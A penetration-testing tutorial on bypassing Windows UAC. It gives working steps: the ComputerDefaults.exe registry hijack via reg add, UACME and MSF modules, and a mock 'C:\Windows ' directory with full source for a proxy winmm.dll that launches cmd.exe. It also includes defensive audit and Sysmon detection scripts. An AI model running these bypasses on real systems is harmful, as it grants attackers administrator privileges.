Bypass UAC

UAC

First, what is UAC?

Windows introduced it starting with Windows Vista.

UAC: User Account Control

Roughly speaking, it is this thing:

the window that pops up every time we install something.

So why does this prompt appear?

Although our local user is in the Administrators group,

an administrator normally runs tasks with low privileges; this state is called Protected Administrator.

When the administrator wants to perform a privileged operation, UAC prompts.

Purpose

UAC's purpose: block unauthorized applications from installing automatically and prevent unintended changes to system settings.

When UAC prompts

Some operations trigger a UAC prompt and some do not.

UAC applies to all users.

When a standard user logs on, the system creates a standard user access token.

When a member of the Administrators group logs on, the system creates two separate access tokens: a standard user access token and an administrator access token.

The standard user access token is used for ordinary operations.

When a privileged operation is needed, UAC is triggered and a prompt appears; after consent, the administrator access token is used.

When an account other than RID 500 (the built-in Administrator) logs on, the user is given two tokens: a normal access token and an administrator access token.

The two tokens are almost identical; the administrator token simply carries the Windows administrative privileges and the related SIDs.

When the user only runs ordinary programs, only the normal access token is used.

When a privileged operation is requested, the user is told that this is a privileged operation requiring approval; after consent, the administrator token is used for the access.

Bypass UAC techniques

In some scenarios, for example when the user we obtained is in the Administrators group,

operations are still restricted despite the group membership and we do not get the administrator privileges we are after; at that point bypassing UAC is worth considering.

There are several methods:

Abusing the UAC whitelist

DLL hijacking

Abusing COM interfaces

Mocking a trusted directory

UACME

MSF

UAC whitelist

Windows has a UAC whitelist mechanism, i.e. certain whitelisted programs run directly with administrator privileges.

For example: wusa.exe, rundll32.exe, and so on.

During a penetration test, DLL hijacking, DLL injection, registry hijacking and similar methods can be used against these programs to bypass UAC.

Microsoft provides dedicated tools for finding whitelisted processes: Sigcheck and Strings (both from Sysinternals).

A whitelisted program generally has autoElevate set to true in its manifest data.

Sigcheck can check whether a given program has the autoElevate attribute.

Strings can find every program that carries the autoElevate attribute.

Sigcheck

sigcheck64.exe /accepteula -m C:\Windows\System32\ComputerDefaults.exe

Check whether ComputerDefaults.exe is in the whitelist.

The output shows autoElevate set to true, confirming it is whitelisted.

Strings

strings64.exe /accepteula -s C:\Windows\System32\*.exe | findstr /i "autoElevate"

This lists a whole bunch of whitelisted programs.

Take ComputerDefaults.exe as an example.

First open Process Monitor and add a filter for ComputerDefaults.exe.

Type ComputerDefaults.exe into the blank field of the filter dialog.

Then simply run ComputerDefaults.exe.

There are a great many registry operations. How exactly to read them, I wasn't sure myself; only after consulting the relevant books did I understand a little.

From the books:

When ComputerDefaults.exe runs, it first queries the data under the registry key HKCU\Software\Classes\ms-settings\Shell\Open\Command.

When it finds that this path does not exist, it goes on to query and read the data under HKCR\ms-settings\Shell\Open\Command\DelegateExecute.

Because a standard user has write permission on that HKCU key, we can run the following commands to write the path of the program we want executed into both the default value and the DelegateExecute value:

reg add "HKCU\Software\Classes\ms-settings\Shell\Open\Command" /d "C:\Windows\System32\cmd.exe" /f

reg add "HKCU\Software\Classes\ms-settings\Shell\Open\Command" /v DelegateExecute /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f

After writing them, run ComputerDefaults.exe again.

A cmd window pops up without any UAC prompt.

Above we wrote cmd.exe; it can be replaced with something else, such as an MSF payload.

Because it runs with administrator privileges, it checks straight in to MSF, and getsystem can then be used to escalate further.
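For the defender side, here is an audit script I added (it is my own, not part of the original post) that looks for exactly the per-user ms-settings override written above and optionally removes it. It assumes it runs inside the user profile being checked; the key and value names are the ones from the reg add commands.

```powershell
# Added audit script (not from the original post): looks for the per-user
# ms-settings handler override that ComputerDefaults.exe consults, as described
# above, and optionally removes it. Assumes it runs in the profile being checked.
param([switch]$Remediate)

$KeyPath = 'HKCU:\Software\Classes\ms-settings\Shell\Open\Command'

function Get-MsSettingsOverride {
    # A clean profile has no HKCU\Software\Classes\ms-settings key at all; the
    # real handler lives under HKCR, so anything found here is suspect.
    if (-not (Test-Path -LiteralPath $KeyPath)) {
        return [pscustomobject]@{ Present = $false; Command = $null; DelegateExecute = $null; Suspicious = $false }
    }
    $props = Get-ItemProperty -LiteralPath $KeyPath
    $cmd   = $props.'(default)'
    $del   = $props.DelegateExecute
    [pscustomobject]@{
        Present         = $true
        Command         = $cmd
        DelegateExecute = $del
        # Any DelegateExecute value under HKCU, or a command pointing at a shell or
        # script host, is the pattern produced by the reg add commands above.
        Suspicious      = ($null -ne $del) -or ($cmd -match 'cmd\.exe|powershell|wscript|cscript|mshta|rundll32')
    }
}

$finding = Get-MsSettingsOverride
$finding | Format-List

if ($finding.Present -and $Remediate) {
    # Deleting the HKCU override makes ComputerDefaults.exe fall back to the HKCR handler.
    Remove-Item -LiteralPath 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
    Write-Output 'Removed HKCU ms-settings override.'
}
```

With Sysmon installed, the same write shows up as Event ID 13 (RegistryEvent, value set) with a TargetObject ending in ms-settings\Shell\Open\Command, which is worth an alert on its own.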

UACME

UACME is a project dedicated to bypassing UAC; at the time of writing it contains 76 bypass methods.

In UACME every method has a number and is invoked through the main program, Akagi.exe.

Usage

akagi.exe [key] [param]

#key is the number of the method to use
#param is the program or command to run after the bypass; the default is a cmd window

MSF

The MSF framework also contains a number of bypass-UAC exploit modules.

Use the matching module to escalate privileges.

Combining DLL hijacking for the bypass

It follows that UAC-whitelisted programs load DLL files, so by hijacking a DLL loaded by a whitelisted program we can slip past UAC and escalate privileges.

But! The DLLs these whitelisted programs load are almost all located in trusted directories, and it is unrealistic for a normal user to modify a trusted directory.

So we mock a trusted root directory instead.

Mocking a trusted root directory

First we need to know the conditions a program must meet in order to elevate.

When a whitelisted program requests elevation:

  1. It first checks whether autoElevate in the program's manifest is true.
  2. It then checks the executable's signature, so the executable itself cannot be impersonated.
  3. Finally it checks whether the program is located in a trusted root directory.

All three conditions are required.

The first two are easy to satisfy:

find a whitelisted program and copy it.

Evading the trusted root directory check

The rule the system uses to check the trusted root directory:

During the check, the system calls a function that strips the space from the executable's path.

So we can mock a trusted root directory through the naming of the path:

create a directory ourselves whose name contains a space.

C:\Windows \System32

Reproducing with WinSAT.exe

Following the principle above, we hijack a DLL.

Mock the trusted root directory:

md "\\?\C:\Windows "
md "\\?\C:\Windows \System32"
copy C:\Windows\System32\WinSAT.exe "\\?\C:\Windows \System32\WinSAT.exe"

Created successfully.

Analysing the DLLs

Run the WinSAT.exe from the mock trusted root directory with Process Monitor open and look at its DLL loads.

We find that every DLL load from our mock trusted root directory fails, which is what leaves room for the hijack.

Among the DLLs that fail to load we choose WINMM.dll for the hijack.

Use the Get-Exports.ps1 script to dump the exported functions:

Import-Module .\Get-Exports.ps1

Get-Exports -DllPath c:\Windows\system32\winmm.dll -ExportsToCpp C:\Users\wo\Desktop\export.txt

Look at the exports and generate the C++ code (the export list becomes the forwarding pragmas below):

// dllmain.cpp : entry point of the proxy DLL. The linker pragmas below forward
// every winmm.dll export to [FORWARD_DLL_HERE].dll (a renamed copy of the real
// winmm.dll, see below), so WinSAT.exe keeps working normally.
#include "pch.h"
#include <stdlib.h>
#include <Windows.h>
#include <iostream>

using namespace std;



#pragma comment (linker, "/export:CloseDriver=[FORWARD_DLL_HERE].CloseDriver,@4")
#pragma comment (linker, "/export:DefDriverProc=[FORWARD_DLL_HERE].DefDriverProc,@5")
#pragma comment (linker, "/export:DriverCallback=[FORWARD_DLL_HERE].DriverCallback,@6")
#pragma comment (linker, "/export:DrvGetModuleHandle=[FORWARD_DLL_HERE].DrvGetModuleHandle,@7")
#pragma comment (linker, "/export:GetDriverModuleHandle=[FORWARD_DLL_HERE].GetDriverModuleHandle,@8")
#pragma comment (linker, "/export:OpenDriver=[FORWARD_DLL_HERE].OpenDriver,@9")
#pragma comment (linker, "/export:PlaySound=[FORWARD_DLL_HERE].PlaySound,@10")
#pragma comment (linker, "/export:PlaySoundA=[FORWARD_DLL_HERE].PlaySoundA,@11")
#pragma comment (linker, "/export:PlaySoundW=[FORWARD_DLL_HERE].PlaySoundW,@12")
#pragma comment (linker, "/export:SendDriverMessage=[FORWARD_DLL_HERE].SendDriverMessage,@13")
#pragma comment (linker, "/export:WOWAppExit=[FORWARD_DLL_HERE].WOWAppExit,@14")
#pragma comment (linker, "/export:auxGetDevCapsA=[FORWARD_DLL_HERE].auxGetDevCapsA,@15")
#pragma comment (linker, "/export:auxGetDevCapsW=[FORWARD_DLL_HERE].auxGetDevCapsW,@16")
#pragma comment (linker, "/export:auxGetNumDevs=[FORWARD_DLL_HERE].auxGetNumDevs,@17")
#pragma comment (linker, "/export:auxGetVolume=[FORWARD_DLL_HERE].auxGetVolume,@18")
#pragma comment (linker, "/export:auxOutMessage=[FORWARD_DLL_HERE].auxOutMessage,@19")
#pragma comment (linker, "/export:auxSetVolume=[FORWARD_DLL_HERE].auxSetVolume,@20")
#pragma comment (linker, "/export:joyConfigChanged=[FORWARD_DLL_HERE].joyConfigChanged,@21")
#pragma comment (linker, "/export:joyGetDevCapsA=[FORWARD_DLL_HERE].joyGetDevCapsA,@22")
#pragma comment (linker, "/export:joyGetDevCapsW=[FORWARD_DLL_HERE].joyGetDevCapsW,@23")
#pragma comment (linker, "/export:joyGetNumDevs=[FORWARD_DLL_HERE].joyGetNumDevs,@24")
#pragma comment (linker, "/export:joyGetPos=[FORWARD_DLL_HERE].joyGetPos,@25")
#pragma comment (linker, "/export:joyGetPosEx=[FORWARD_DLL_HERE].joyGetPosEx,@26")
#pragma comment (linker, "/export:joyGetThreshold=[FORWARD_DLL_HERE].joyGetThreshold,@27")
#pragma comment (linker, "/export:joyReleaseCapture=[FORWARD_DLL_HERE].joyReleaseCapture,@28")
#pragma comment (linker, "/export:joySetCapture=[FORWARD_DLL_HERE].joySetCapture,@29")
#pragma comment (linker, "/export:joySetThreshold=[FORWARD_DLL_HERE].joySetThreshold,@30")
#pragma comment (linker, "/export:mciDriverNotify=[FORWARD_DLL_HERE].mciDriverNotify,@31")
#pragma comment (linker, "/export:mciDriverYield=[FORWARD_DLL_HERE].mciDriverYield,@32")
#pragma comment (linker, "/export:mciExecute=[FORWARD_DLL_HERE].mciExecute,@3")
#pragma comment (linker, "/export:mciFreeCommandResource=[FORWARD_DLL_HERE].mciFreeCommandResource,@33")
#pragma comment (linker, "/export:mciGetCreatorTask=[FORWARD_DLL_HERE].mciGetCreatorTask,@34")
#pragma comment (linker, "/export:mciGetDeviceIDA=[FORWARD_DLL_HERE].mciGetDeviceIDA,@35")
#pragma comment (linker, "/export:mciGetDeviceIDFromElementIDA=[FORWARD_DLL_HERE].mciGetDeviceIDFromElementIDA,@36")
#pragma comment (linker, "/export:mciGetDeviceIDFromElementIDW=[FORWARD_DLL_HERE].mciGetDeviceIDFromElementIDW,@37")
#pragma comment (linker, "/export:mciGetDeviceIDW=[FORWARD_DLL_HERE].mciGetDeviceIDW,@38")
#pragma comment (linker, "/export:mciGetDriverData=[FORWARD_DLL_HERE].mciGetDriverData,@39")
#pragma comment (linker, "/export:mciGetErrorStringA=[FORWARD_DLL_HERE].mciGetErrorStringA,@40")
#pragma comment (linker, "/export:mciGetErrorStringW=[FORWARD_DLL_HERE].mciGetErrorStringW,@41")
#pragma comment (linker, "/export:mciGetYieldProc=[FORWARD_DLL_HERE].mciGetYieldProc,@42")
#pragma comment (linker, "/export:mciLoadCommandResource=[FORWARD_DLL_HERE].mciLoadCommandResource,@43")
#pragma comment (linker, "/export:mciSendCommandA=[FORWARD_DLL_HERE].mciSendCommandA,@44")
#pragma comment (linker, "/export:mciSendCommandW=[FORWARD_DLL_HERE].mciSendCommandW,@45")
#pragma comment (linker, "/export:mciSendStringA=[FORWARD_DLL_HERE].mciSendStringA,@46")
#pragma comment (linker, "/export:mciSendStringW=[FORWARD_DLL_HERE].mciSendStringW,@47")
#pragma comment (linker, "/export:mciSetDriverData=[FORWARD_DLL_HERE].mciSetDriverData,@48")
#pragma comment (linker, "/export:mciSetYieldProc=[FORWARD_DLL_HERE].mciSetYieldProc,@49")
#pragma comment (linker, "/export:midiConnect=[FORWARD_DLL_HERE].midiConnect,@50")
#pragma comment (linker, "/export:midiDisconnect=[FORWARD_DLL_HERE].midiDisconnect,@51")
#pragma comment (linker, "/export:midiInAddBuffer=[FORWARD_DLL_HERE].midiInAddBuffer,@52")
#pragma comment (linker, "/export:midiInClose=[FORWARD_DLL_HERE].midiInClose,@53")
#pragma comment (linker, "/export:midiInGetDevCapsA=[FORWARD_DLL_HERE].midiInGetDevCapsA,@54")
#pragma comment (linker, "/export:midiInGetDevCapsW=[FORWARD_DLL_HERE].midiInGetDevCapsW,@55")
#pragma comment (linker, "/export:midiInGetErrorTextA=[FORWARD_DLL_HERE].midiInGetErrorTextA,@56")
#pragma comment (linker, "/export:midiInGetErrorTextW=[FORWARD_DLL_HERE].midiInGetErrorTextW,@57")
#pragma comment (linker, "/export:midiInGetID=[FORWARD_DLL_HERE].midiInGetID,@58")
#pragma comment (linker, "/export:midiInGetNumDevs=[FORWARD_DLL_HERE].midiInGetNumDevs,@59")
#pragma comment (linker, "/export:midiInMessage=[FORWARD_DLL_HERE].midiInMessage,@60")
#pragma comment (linker, "/export:midiInOpen=[FORWARD_DLL_HERE].midiInOpen,@61")
#pragma comment (linker, "/export:midiInPrepareHeader=[FORWARD_DLL_HERE].midiInPrepareHeader,@62")
#pragma comment (linker, "/export:midiInReset=[FORWARD_DLL_HERE].midiInReset,@63")
#pragma comment (linker, "/export:midiInStart=[FORWARD_DLL_HERE].midiInStart,@64")
#pragma comment (linker, "/export:midiInStop=[FORWARD_DLL_HERE].midiInStop,@65")
#pragma comment (linker, "/export:midiInUnprepareHeader=[FORWARD_DLL_HERE].midiInUnprepareHeader,@66")
#pragma comment (linker, "/export:midiOutCacheDrumPatches=[FORWARD_DLL_HERE].midiOutCacheDrumPatches,@67")
#pragma comment (linker, "/export:midiOutCachePatches=[FORWARD_DLL_HERE].midiOutCachePatches,@68")
#pragma comment (linker, "/export:midiOutClose=[FORWARD_DLL_HERE].midiOutClose,@69")
#pragma comment (linker, "/export:midiOutGetDevCapsA=[FORWARD_DLL_HERE].midiOutGetDevCapsA,@70")
#pragma comment (linker, "/export:midiOutGetDevCapsW=[FORWARD_DLL_HERE].midiOutGetDevCapsW,@71")
#pragma comment (linker, "/export:midiOutGetErrorTextA=[FORWARD_DLL_HERE].midiOutGetErrorTextA,@72")
#pragma comment (linker, "/export:midiOutGetErrorTextW=[FORWARD_DLL_HERE].midiOutGetErrorTextW,@73")
#pragma comment (linker, "/export:midiOutGetID=[FORWARD_DLL_HERE].midiOutGetID,@74")
#pragma comment (linker, "/export:midiOutGetNumDevs=[FORWARD_DLL_HERE].midiOutGetNumDevs,@75")
#pragma comment (linker, "/export:midiOutGetVolume=[FORWARD_DLL_HERE].midiOutGetVolume,@76")
#pragma comment (linker, "/export:midiOutLongMsg=[FORWARD_DLL_HERE].midiOutLongMsg,@77")
#pragma comment (linker, "/export:midiOutMessage=[FORWARD_DLL_HERE].midiOutMessage,@78")
#pragma comment (linker, "/export:midiOutOpen=[FORWARD_DLL_HERE].midiOutOpen,@79")
#pragma comment (linker, "/export:midiOutPrepareHeader=[FORWARD_DLL_HERE].midiOutPrepareHeader,@80")
#pragma comment (linker, "/export:midiOutReset=[FORWARD_DLL_HERE].midiOutReset,@81")
#pragma comment (linker, "/export:midiOutSetVolume=[FORWARD_DLL_HERE].midiOutSetVolume,@82")
#pragma comment (linker, "/export:midiOutShortMsg=[FORWARD_DLL_HERE].midiOutShortMsg,@83")
#pragma comment (linker, "/export:midiOutUnprepareHeader=[FORWARD_DLL_HERE].midiOutUnprepareHeader,@84")
#pragma comment (linker, "/export:midiStreamClose=[FORWARD_DLL_HERE].midiStreamClose,@85")
#pragma comment (linker, "/export:midiStreamOpen=[FORWARD_DLL_HERE].midiStreamOpen,@86")
#pragma comment (linker, "/export:midiStreamOut=[FORWARD_DLL_HERE].midiStreamOut,@87")
#pragma comment (linker, "/export:midiStreamPause=[FORWARD_DLL_HERE].midiStreamPause,@88")
#pragma comment (linker, "/export:midiStreamPosition=[FORWARD_DLL_HERE].midiStreamPosition,@89")
#pragma comment (linker, "/export:midiStreamProperty=[FORWARD_DLL_HERE].midiStreamProperty,@90")
#pragma comment (linker, "/export:midiStreamRestart=[FORWARD_DLL_HERE].midiStreamRestart,@91")
#pragma comment (linker, "/export:midiStreamStop=[FORWARD_DLL_HERE].midiStreamStop,@92")
#pragma comment (linker, "/export:mixerClose=[FORWARD_DLL_HERE].mixerClose,@93")
#pragma comment (linker, "/export:mixerGetControlDetailsA=[FORWARD_DLL_HERE].mixerGetControlDetailsA,@94")
#pragma comment (linker, "/export:mixerGetControlDetailsW=[FORWARD_DLL_HERE].mixerGetControlDetailsW,@95")
#pragma comment (linker, "/export:mixerGetDevCapsA=[FORWARD_DLL_HERE].mixerGetDevCapsA,@96")
#pragma comment (linker, "/export:mixerGetDevCapsW=[FORWARD_DLL_HERE].mixerGetDevCapsW,@97")
#pragma comment (linker, "/export:mixerGetID=[FORWARD_DLL_HERE].mixerGetID,@98")
#pragma comment (linker, "/export:mixerGetLineControlsA=[FORWARD_DLL_HERE].mixerGetLineControlsA,@99")
#pragma comment (linker, "/export:mixerGetLineControlsW=[FORWARD_DLL_HERE].mixerGetLineControlsW,@100")
#pragma comment (linker, "/export:mixerGetLineInfoA=[FORWARD_DLL_HERE].mixerGetLineInfoA,@101")
#pragma comment (linker, "/export:mixerGetLineInfoW=[FORWARD_DLL_HERE].mixerGetLineInfoW,@102")
#pragma comment (linker, "/export:mixerGetNumDevs=[FORWARD_DLL_HERE].mixerGetNumDevs,@103")
#pragma comment (linker, "/export:mixerMessage=[FORWARD_DLL_HERE].mixerMessage,@104")
#pragma comment (linker, "/export:mixerOpen=[FORWARD_DLL_HERE].mixerOpen,@105")
#pragma comment (linker, "/export:mixerSetControlDetails=[FORWARD_DLL_HERE].mixerSetControlDetails,@106")
#pragma comment (linker, "/export:mmDrvInstall=[FORWARD_DLL_HERE].mmDrvInstall,@107")
#pragma comment (linker, "/export:mmGetCurrentTask=[FORWARD_DLL_HERE].mmGetCurrentTask,@108")
#pragma comment (linker, "/export:mmTaskBlock=[FORWARD_DLL_HERE].mmTaskBlock,@109")
#pragma comment (linker, "/export:mmTaskCreate=[FORWARD_DLL_HERE].mmTaskCreate,@110")
#pragma comment (linker, "/export:mmTaskSignal=[FORWARD_DLL_HERE].mmTaskSignal,@111")
#pragma comment (linker, "/export:mmTaskYield=[FORWARD_DLL_HERE].mmTaskYield,@112")
#pragma comment (linker, "/export:mmioAdvance=[FORWARD_DLL_HERE].mmioAdvance,@113")
#pragma comment (linker, "/export:mmioAscend=[FORWARD_DLL_HERE].mmioAscend,@114")
#pragma comment (linker, "/export:mmioClose=[FORWARD_DLL_HERE].mmioClose,@115")
#pragma comment (linker, "/export:mmioCreateChunk=[FORWARD_DLL_HERE].mmioCreateChunk,@116")
#pragma comment (linker, "/export:mmioDescend=[FORWARD_DLL_HERE].mmioDescend,@117")
#pragma comment (linker, "/export:mmioFlush=[FORWARD_DLL_HERE].mmioFlush,@118")
#pragma comment (linker, "/export:mmioGetInfo=[FORWARD_DLL_HERE].mmioGetInfo,@119")
#pragma comment (linker, "/export:mmioInstallIOProcA=[FORWARD_DLL_HERE].mmioInstallIOProcA,@120")
#pragma comment (linker, "/export:mmioInstallIOProcW=[FORWARD_DLL_HERE].mmioInstallIOProcW,@121")
#pragma comment (linker, "/export:mmioOpenA=[FORWARD_DLL_HERE].mmioOpenA,@122")
#pragma comment (linker, "/export:mmioOpenW=[FORWARD_DLL_HERE].mmioOpenW,@123")
#pragma comment (linker, "/export:mmioRead=[FORWARD_DLL_HERE].mmioRead,@124")
#pragma comment (linker, "/export:mmioRenameA=[FORWARD_DLL_HERE].mmioRenameA,@125")
#pragma comment (linker, "/export:mmioRenameW=[FORWARD_DLL_HERE].mmioRenameW,@126")
#pragma comment (linker, "/export:mmioSeek=[FORWARD_DLL_HERE].mmioSeek,@127")
#pragma comment (linker, "/export:mmioSendMessage=[FORWARD_DLL_HERE].mmioSendMessage,@128")
#pragma comment (linker, "/export:mmioSetBuffer=[FORWARD_DLL_HERE].mmioSetBuffer,@129")
#pragma comment (linker, "/export:mmioSetInfo=[FORWARD_DLL_HERE].mmioSetInfo,@130")
#pragma comment (linker, "/export:mmioStringToFOURCCA=[FORWARD_DLL_HERE].mmioStringToFOURCCA,@131")
#pragma comment (linker, "/export:mmioStringToFOURCCW=[FORWARD_DLL_HERE].mmioStringToFOURCCW,@132")
#pragma comment (linker, "/export:mmioWrite=[FORWARD_DLL_HERE].mmioWrite,@133")
#pragma comment (linker, "/export:mmsystemGetVersion=[FORWARD_DLL_HERE].mmsystemGetVersion,@134")
#pragma comment (linker, "/export:sndPlaySoundA=[FORWARD_DLL_HERE].sndPlaySoundA,@135")
#pragma comment (linker, "/export:sndPlaySoundW=[FORWARD_DLL_HERE].sndPlaySoundW,@136")
#pragma comment (linker, "/export:timeBeginPeriod=[FORWARD_DLL_HERE].timeBeginPeriod,@137")
#pragma comment (linker, "/export:timeEndPeriod=[FORWARD_DLL_HERE].timeEndPeriod,@138")
#pragma comment (linker, "/export:timeGetDevCaps=[FORWARD_DLL_HERE].timeGetDevCaps,@139")
#pragma comment (linker, "/export:timeGetSystemTime=[FORWARD_DLL_HERE].timeGetSystemTime,@140")
#pragma comment (linker, "/export:timeGetTime=[FORWARD_DLL_HERE].timeGetTime,@141")
#pragma comment (linker, "/export:timeKillEvent=[FORWARD_DLL_HERE].timeKillEvent,@142")
#pragma comment (linker, "/export:timeSetEvent=[FORWARD_DLL_HERE].timeSetEvent,@143")
#pragma comment (linker, "/export:waveInAddBuffer=[FORWARD_DLL_HERE].waveInAddBuffer,@144")
#pragma comment (linker, "/export:waveInClose=[FORWARD_DLL_HERE].waveInClose,@145")
#pragma comment (linker, "/export:waveInGetDevCapsA=[FORWARD_DLL_HERE].waveInGetDevCapsA,@146")
#pragma comment (linker, "/export:waveInGetDevCapsW=[FORWARD_DLL_HERE].waveInGetDevCapsW,@147")
#pragma comment (linker, "/export:waveInGetErrorTextA=[FORWARD_DLL_HERE].waveInGetErrorTextA,@148")
#pragma comment (linker, "/export:waveInGetErrorTextW=[FORWARD_DLL_HERE].waveInGetErrorTextW,@149")
#pragma comment (linker, "/export:waveInGetID=[FORWARD_DLL_HERE].waveInGetID,@150")
#pragma comment (linker, "/export:waveInGetNumDevs=[FORWARD_DLL_HERE].waveInGetNumDevs,@151")
#pragma comment (linker, "/export:waveInGetPosition=[FORWARD_DLL_HERE].waveInGetPosition,@152")
#pragma comment (linker, "/export:waveInMessage=[FORWARD_DLL_HERE].waveInMessage,@153")
#pragma comment (linker, "/export:waveInOpen=[FORWARD_DLL_HERE].waveInOpen,@154")
#pragma comment (linker, "/export:waveInPrepareHeader=[FORWARD_DLL_HERE].waveInPrepareHeader,@155")
#pragma comment (linker, "/export:waveInReset=[FORWARD_DLL_HERE].waveInReset,@156")
#pragma comment (linker, "/export:waveInStart=[FORWARD_DLL_HERE].waveInStart,@157")
#pragma comment (linker, "/export:waveInStop=[FORWARD_DLL_HERE].waveInStop,@158")
#pragma comment (linker, "/export:waveInUnprepareHeader=[FORWARD_DLL_HERE].waveInUnprepareHeader,@159")
#pragma comment (linker, "/export:waveOutBreakLoop=[FORWARD_DLL_HERE].waveOutBreakLoop,@160")
#pragma comment (linker, "/export:waveOutClose=[FORWARD_DLL_HERE].waveOutClose,@161")
#pragma comment (linker, "/export:waveOutGetDevCapsA=[FORWARD_DLL_HERE].waveOutGetDevCapsA,@162")
#pragma comment (linker, "/export:waveOutGetDevCapsW=[FORWARD_DLL_HERE].waveOutGetDevCapsW,@163")
#pragma comment (linker, "/export:waveOutGetErrorTextA=[FORWARD_DLL_HERE].waveOutGetErrorTextA,@164")
#pragma comment (linker, "/export:waveOutGetErrorTextW=[FORWARD_DLL_HERE].waveOutGetErrorTextW,@165")
#pragma comment (linker, "/export:waveOutGetID=[FORWARD_DLL_HERE].waveOutGetID,@166")
#pragma comment (linker, "/export:waveOutGetNumDevs=[FORWARD_DLL_HERE].waveOutGetNumDevs,@167")
#pragma comment (linker, "/export:waveOutGetPitch=[FORWARD_DLL_HERE].waveOutGetPitch,@168")
#pragma comment (linker, "/export:waveOutGetPlaybackRate=[FORWARD_DLL_HERE].waveOutGetPlaybackRate,@169")
#pragma comment (linker, "/export:waveOutGetPosition=[FORWARD_DLL_HERE].waveOutGetPosition,@170")
#pragma comment (linker, "/export:waveOutGetVolume=[FORWARD_DLL_HERE].waveOutGetVolume,@171")
#pragma comment (linker, "/export:waveOutMessage=[FORWARD_DLL_HERE].waveOutMessage,@172")
#pragma comment (linker, "/export:waveOutOpen=[FORWARD_DLL_HERE].waveOutOpen,@173")
#pragma comment (linker, "/export:waveOutPause=[FORWARD_DLL_HERE].waveOutPause,@174")
#pragma comment (linker, "/export:waveOutPrepareHeader=[FORWARD_DLL_HERE].waveOutPrepareHeader,@175")
#pragma comment (linker, "/export:waveOutReset=[FORWARD_DLL_HERE].waveOutReset,@176")
#pragma comment (linker, "/export:waveOutRestart=[FORWARD_DLL_HERE].waveOutRestart,@177")
#pragma comment (linker, "/export:waveOutSetPitch=[FORWARD_DLL_HERE].waveOutSetPitch,@178")
#pragma comment (linker, "/export:waveOutSetPlaybackRate=[FORWARD_DLL_HERE].waveOutSetPlaybackRate,@179")
#pragma comment (linker, "/export:waveOutSetVolume=[FORWARD_DLL_HERE].waveOutSetVolume,@180")
#pragma comment (linker, "/export:waveOutUnprepareHeader=[FORWARD_DLL_HERE].waveOutUnprepareHeader,@181")
#pragma comment (linker, "/export:waveOutWrite=[FORWARD_DLL_HERE].waveOutWrite,@182")


BOOL WINAPI DllMain(HINSTANCE hInst, DWORD reason, LPVOID)
{
    // Only act once, when the DLL is first mapped into WinSAT.exe; thread
    // attach/detach notifications would otherwise spawn extra windows.
    if (reason == DLL_PROCESS_ATTACH)
    {
        system("start cmd.exe");
    }
    return TRUE;
}

After compiling, a DLL is produced.

Rename the DLL to winmm.dll

and place it in the mock trusted root directory.

Finally open the WinSAT.exe in the mock trusted root directory; a prompt appears saying that the file [FORWARD_DLL_HERE].dll is missing.

I got stuck here for a moment.

The real winmm.dll has to be copied, renamed to [FORWARD_DLL_HERE].dll, and placed in the mock trusted root directory (that name is what the forwarding pragmas point to).

Running it again shows two more DLLs missing; copy those from the original directory into the mock root directory as well.

Run WinSAT.exe and a cmd window pops up.
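A defender's view of the chain above, as an added example that is my own and not part of the original post: detection rules run over Sysmon-style process-creation and image-load records. The field names are Sysmon's (Event ID 1 and 7); the records themselves are constructed for the demo and mirror the WinSAT.exe / winmm.dll walkthrough.

```powershell
# Added example, not part of the original post: detection logic for the mock
# trusted directory / DLL proxy chain walked through above, run over constructed
# Sysmon-style records. Field names follow Sysmon Event ID 1 (process create)
# and 7 (image load); the records themselves are made up for this demo.
$SampleEvents = @(
    [pscustomobject]@{ Id = 1; Image = 'C:\Windows\System32\WinSAT.exe'; ParentImage = 'C:\Windows\explorer.exe'; IntegrityLevel = 'High' }
    [pscustomobject]@{ Id = 1; Image = 'C:\Windows \System32\WinSAT.exe'; ParentImage = 'C:\Windows\explorer.exe'; IntegrityLevel = 'High' }
    [pscustomobject]@{ Id = 7; Image = 'C:\Windows \System32\WinSAT.exe'; ImageLoaded = 'C:\Windows \System32\winmm.dll'; Signed = 'false' }
    [pscustomobject]@{ Id = 7; Image = 'C:\Windows\System32\WinSAT.exe'; ImageLoaded = 'C:\Windows\System32\winmm.dll'; Signed = 'true' }
    [pscustomobject]@{ Id = 1; Image = 'C:\Windows\System32\cmd.exe'; ParentImage = 'C:\Windows \System32\WinSAT.exe'; IntegrityLevel = 'High' }
)

function Test-MockTrustedPath {
    param([string]$Path)
    # Normal Win32 path handling strips trailing spaces and periods from every
    # component, so a component ending in one can only come from a \\?\-created
    # directory such as "C:\Windows \" above.
    return [bool]($Path -match '[ .]\\')
}

function Find-UacBypassIndicators {
    param([object[]]$Events)
    foreach ($e in $Events) {
        switch ($e.Id) {
            1 {
                if (Test-MockTrustedPath $e.Image) {
                    [pscustomobject]@{ Rule = 'process-from-mock-trusted-dir'; Image = $e.Image; Detail = "IntegrityLevel=$($e.IntegrityLevel)" }
                }
                elseif (Test-MockTrustedPath $e.ParentImage) {
                    # The cmd.exe spawned from DllMain above inherits the elevated token.
                    [pscustomobject]@{ Rule = 'child-of-mock-trusted-dir-process'; Image = $e.Image; Detail = "ParentImage=$($e.ParentImage)" }
                }
            }
            7 {
                if (Test-MockTrustedPath $e.ImageLoaded) {
                    [pscustomobject]@{ Rule = 'dll-loaded-from-mock-trusted-dir'; Image = $e.Image; Detail = "ImageLoaded=$($e.ImageLoaded) Signed=$($e.Signed)" }
                }
                elseif ($e.Signed -eq 'false' -and $e.Image -like 'C:\Windows\System32\*') {
                    # Generic DLL-hijack signal: a System32 binary pulling in an unsigned DLL.
                    [pscustomobject]@{ Rule = 'unsigned-dll-in-system32-binary'; Image = $e.Image; Detail = "ImageLoaded=$($e.ImageLoaded)" }
                }
            }
        }
    }
}

# Three of the five constructed records should be flagged: the WinSAT.exe
# launched from the mock directory, the winmm.dll it loads, and the cmd.exe child.
Find-UacBypassIndicators -Events $SampleEvents | Format-Table -AutoSize
```

To run it against a real host, build the records from Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' by mapping the event XML fields onto the same property names.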
